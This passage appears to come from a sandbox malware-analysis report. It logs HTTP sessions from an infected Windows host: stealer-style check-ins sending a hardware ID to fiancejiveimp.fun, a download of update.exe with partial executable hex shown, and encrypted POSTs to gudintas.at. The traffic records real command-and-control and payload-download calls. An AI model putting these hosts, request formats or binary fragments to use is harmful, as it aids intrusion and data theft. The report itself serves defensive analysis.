                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:02:43.472035885 CEST3906OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:44.489393950 CEST4137INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:44 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=1si40uq39eoeg9omhpm8cj0dur; expires=Sat, 27 Jan 2024 09:49:23 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:44 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QNVEvATlbom%2B3FktBQ1dLtHhZz3sS0xZV7EYEgOqf6EjkjCFMqlk2C%2FwPI5wxa2lvxtBXDHO35dFsXqLoJmacXUf%2Fn0rywnBBYBRMtIP6N0w0Otw9G8LIURU4knBhEubHpIvYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8106693deda73962-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:44.489412069 CEST4137INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        18192.168.2.349833193.149.185.13980C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:43.543307066 CEST3906OUTGET /ofdskiewerews/update.exe HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Host: 193.149.185.139
                                                                                                        Oct 3, 2023 18:02:43.713009119 CEST3908INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:43 GMT
                                                                                                        Server: Apache/2.4.52 (Ubuntu)
                                                                                                        Last-Modified: Tue, 03 Oct 2023 07:15:06 GMT
                                                                                                        ETag: "98800-606caa6821478"
                                                                                                        Accept-Ranges: bytes
                                                                                                        Content-Length: 624640
                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-msdos-program
                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3d 6a 10 68 79 0b 7e 3b 79 0b 7e 3b 79 0b 7e 3b aa 79 7d 3a 72 0b 7e 3b aa 79 7b 3a e9 0b 7e 3b aa 79 7a 3a 6d 0b 7e 3b 36 77 7a 3a 68 0b 7e 3b aa 79 7f 3a 70 0b 7e 3b 79 0b 7f 3b f4 0b 7e 3b 36 77 7b 3a 47 0b 7e 3b 36 77 7d 3a 6f 0b 7e 3b b8 77 7b 3a 78 0b 7e 3b b8 77 7e 3a 78 0b 7e 3b b8 77 81 3b 78 0b 7e 3b b8 77 7c 3a 78 0b 7e 3b 52 69 63 68 79 0b 7e 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 cc be 1b 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 22 00 78 01 00 00 18 08 00 00 00 00 00 88 62 00 00 00 10 00 00 00 90 01 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 09 00 00 04 00 00 00 00 00 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 1c 02 00 50 00 00 00 c0 1c 02 00 64 00 00 00 00 a0 09 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 09 00 68 19 00 00 b0 fb 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 01 00 18 00 00 00 f0 fa 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 09 76 01 00 00 10 00 00 00 78 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 00 96 00 00 00 90 01 00 00 96 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f0 65 07 00 00 30 02 00 00 5a 07 00 00 12 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 a0 09 00 00 02 00 00 00 6c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 19 00 00 00 b0 09 00 00 1a 00 00 00 6e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$=jhy~;y~;y~;y}:r~;y{:~;yz:m~;6wz:h~;y:p~;y;~;6w{:G~;6w}:o~;w{:x~;w~:x~;w;x~;w|:x~;Richy~;PELe"xb@@pPdh@.textvx `.rdata|@@.datae0Z@.rsrcl@@.relochn@B
                                                                                                        Oct 3, 2023 18:02:43.713059902 CEST3909INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 08 b8 92 83 41 00 e8 70 4f 00 00 b8 d4 72 49 00 c7 45 f0 78 72 49 00 89 45 ec 83 65 fc 00 c7 05 d4 72 49
                                                                                                        Data Ascii: jApOrIExrIEerI(AEhBPhrI&=MhAMOjAOlrIErIEelrIDAEhDBPhrI<MhALNhIWB$ALY
                                                                                                        Oct 3, 2023 18:02:43.713185072 CEST3910INData Raw: 89 47 04 b0 01 eb 02 32 c0 5f 5e c2 04 00 83 ec 0c 8b cc ff 74 24 18 e8 81 0a 00 00 8b 44 24 14 8b 4c 24 10 ff 30 e8 9a 05 00 00 c3 83 7c 24 04 00 56 8b f1 74 23 ff 74 24 08 e8 a1 14 00 00 8b 44 24 10 56 ff 36 ff 30 8b 44 24 18 ff 30 e8 1d 02 00
                                                                                                        Data Ascii: G2_^t$D$L$0|$Vt#t$D$V60D$0F^T$Bt@BAVt$W|$+|$Wt$VFU7_^L$D$t$PQUE=rEPEPEYYPuREYY]D$t0u+Vh
                                                                                                        Oct 3, 2023 18:02:43.713233948 CEST3912INData Raw: 46 74 88 46 76 8b 44 24 08 89 46 78 8b c6 5e c2 04 00 56 6a 01 8b f1 e8 f6 01 00 00 ff 74 24 08 8d 4e 6c c7 06 68 93 41 00 83 21 00 83 61 04 00 e8 5a fd ff ff 8b c6 5e c2 04 00 56 ff 74 24 08 8b f1 e8 8e fe ff ff 59 50 8b ce e8 67 01 00 00 e8 a8
                                                                                                        Data Ascii: FtFvD$Fx^Vjt$NlhA!aZ^Vt$YPg^Vt$D$AF^Vt$NA!a^!Vt$;tF&AD$A^VWD$P&f|D$$t$FpL$
                                                                                                        Oct 3, 2023 18:02:43.713305950 CEST3913INData Raw: 33 ff ff ff c7 06 c4 92 41 00 8b c6 5e c2 04 00 56 ff 74 24 08 8b f1 e8 44 ff ff ff c7 06 c4 92 41 00 8b c6 5e c2 04 00 56 ff 74 24 08 8b f1 e8 03 ff ff ff c7 06 68 92 41 00 8b c6 5e c2 04 00 56 ff 74 24 08 8b f1 e8 eb fe ff ff c7 06 74 92 41 00
                                                                                                        Data Ascii: 3A^Vt$DA^Vt$hA^Vt$tA^D$VxrPtA^Vt$tA^Vt$WV'gFG_^Vt$%A^UrI3EVMhAuEPu
                                                                                                        Oct 3, 2023 18:02:43.713399887 CEST3914INData Raw: 85 c9 74 05 e8 3f 0a 00 00 83 4d fc ff 8b 4d e0 85 c9 74 05 e8 2f 0a 00 00 e8 51 3b 00 00 c3 8d 45 e8 50 e8 07 0a 00 00 59 8d 45 e8 50 8b 4d dc e8 de 07 00 00 8d 45 e8 50 e8 a8 2a 00 00 59 b8 f3 23 40 00 c3 cc cc cc cc cc 8b 49 24 85 c9 0f 84 42
                                                                                                        Data Ascii: t?MMt/Q;EPYEPMEP*Y#@I$B `|$tt$m1jt$6VD$tj|V6YY^VNlD$tjtVb6YY^VD$thV@6YY^VNtT
                                                                                                        Oct 3, 2023 18:02:43.713481903 CEST3916INData Raw: 50 ff 75 1c ff 55 30 8b 83 28 30 42 00 03 c6 57 89 87 b0 00 00 00 ff 75 20 ff 55 0c 68 b4 2e d6 05 ff 35 a0 88 49 00 e8 f2 15 00 00 59 59 ff 75 20 ff d0 8b 4d 74 5f 5e 33 cd 5b e8 1b 36 00 00 83 c5 78 c9 c3 55 8b ec 51 51 56 8b f1 8d 4d f8 57 8d
                                                                                                        Data Ascii: PuU0(0BWu Uh.5IYYu Mt_^3[6xUQQVMWF(PX}uV)YY9~d|}_^tu(YD$L$#P+wifUEEH$PM]VW|$?wWF_F^\
                                                                                                        Oct 3, 2023 18:02:43.713573933 CEST3917INData Raw: 19 89 59 04 e8 6e e9 ff ff 8b 0e e8 ef 06 00 00 8b 4d 10 85 c9 74 05 e8 20 00 00 00 5f 5e 5b c9 c2 10 00 ff 74 24 04 e8 c3 1f 00 00 ff 74 24 08 e8 c9 1f 00 00 8b 44 24 0c 59 59 c3 56 57 83 cf ff 8b f1 8b c7 f0 0f c1 46 04 75 15 8b 06 ff 10 f0 0f
                                                                                                        Data Ascii: YnMt _^[t$t$D$YYVWFu~Ou_^`_^ItAu`QxtQj|$tjQr,YYVj+|$tjVT,YY^VN|$tj0V4,YY^tjPS
                                                                                                        Oct 3, 2023 18:02:43.713660955 CEST3918INData Raw: ec e4 ff ff 83 c4 0c 83 f8 02 75 25 8d 77 34 56 e8 08 1f 00 00 50 e8 49 f9 ff ff 56 c6 47 64 01 e8 1d 1f 00 00 8d 47 0c 50 e8 a9 1f 00 00 83 c4 10 8b cf 5f 5e 5b e9 24 02 00 00 55 8b ec 83 ec 2c a1 ec 72 49 00 33 c5 89 45 fc 8b 45 0c 8d 4d d4 56
                                                                                                        Data Ascii: u%w4VPIVGdGP_^[$U,rI3EEMVuPf$EPYMF$M3^+UrI3E}$VutWAWzYPWM_MUuRP}EuCEMPMEPM
                                                                                                        Oct 3, 2023 18:02:43.713751078 CEST3920INData Raw: 0a 00 00 5d c2 08 00 6a 0c b8 bd 81 41 00 e8 d3 27 00 00 89 4d ec 83 65 fc 00 ff 75 0c ff 75 08 83 c1 50 e8 a6 ff ff ff 83 4d fc ff e8 26 27 00 00 c2 08 00 b8 3c 38 40 00 c3 eb ec b8 44 38 40 00 c3 eb e4 8b 75 ec 83 7e 0c 00 75 1f 8d 45 e8 50 e8
                                                                                                        Data Ascii: ]jA'MeuuPM&'<8@D8@u~uEPYEPEPcY*8@VWw(VPD$YY9Gd}GdW3VYY_^T$BPUQQVMFPuEPQQMQPY
                                                                                                        Oct 3, 2023 18:02:43.882740974 CEST3921INData Raw: 0c 32 c0 5f 5e 5d c2 0c 00 ff 74 24 0c ff 74 24 0c ff 74 24 0c e8 8e 2d 00 00 8b 44 24 10 83 c4 0c c3 ff 74 24 04 e8 e6 f0 ff ff 8b 44 24 08 59 c3 56 33 f6 39 74 24 0c 0f 86 3e 01 00 00 53 8b 1d 00 90 41 00 57 8b 7c 24 10 ff d3 80 04 3e 7e ff d3
                                                                                                        Data Ascii: 2_^]t$t$t$-D$t$D$YV39t$>SAW|$>~>4>^>>>>4>j>S>4>>>>>>4>>x>>>>>N>|>4>>>&


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        19192.168.2.349835172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:44.758136988 CEST4282OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:02:44.758666039 CEST4283OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:45.101329088 CEST4568INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:45 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=jor2moi1smb6tvj6v30he5hm64; expires=Sat, 27 Jan 2024 09:49:23 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:44 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5Foz8oXaJPZhp%2FZGqwq%2F7V12vedwK7%2FGYumus6qjmtOMmLHy65K6RRlj4WYKiei%2BzkBRkob8sY7IjGaS4zx%2FTvgcxYPWnbemXV6Gg5ufiagVKbCUkJjLQC6vCoGnYkkIp7gtmg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 81066945fb4681bd-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:45.101352930 CEST4568INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        2192.168.2.349815211.40.39.25180C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:21.107786894 CEST289OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://wiygrw.com/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 309
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:02:21.107805014 CEST290OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 7d 52 c5 b6
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA -[k,vu}RcVhH"w[X9mmES6<Da >NviF)8-CH{)hs^:J#dxEEp+?l}{9.z
                                                                                                        Oct 3, 2023 18:02:22.271910906 CEST307INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:02:21 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 331
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        20192.168.2.349837172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:45.329386950 CEST4569OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:02:45.329770088 CEST4570OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:45.663290977 CEST4572INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:45 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=qsn5tu5ic00f1v4okkt294m6oh; expires=Sat, 27 Jan 2024 09:49:24 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:45 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gyn3SVxccRLMC%2BZ0WQ0vA1TAZtCX88x4bN%2BPo7AbXkJQvguLCkidfpatfYxMpYSgCtf%2FtNrISc97WMZKGsdo%2BKPaJWdVBcn0EBH3%2Bdm8%2BIev3k03p7frAUNAe60iT7ZFD0eYrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669498cde1777-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:45.663314104 CEST4572INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        21192.168.2.349838211.104.254.13980C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:45.554933071 CEST4570OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://slodfljw.net/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 159
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:02:45.554960012 CEST4570OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2c 5b 00 6b 2c 90 f4 76 0b 75 50 25 cb 95
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA ,[k,vuP%Bolf'|Apdd>{S#xJbME6';3f|w=
                                                                                                        Oct 3, 2023 18:02:46.793173075 CEST4578INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:02:46 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 331
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        22192.168.2.349839172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:45.905716896 CEST4573OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:02:45.906181097 CEST4573OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
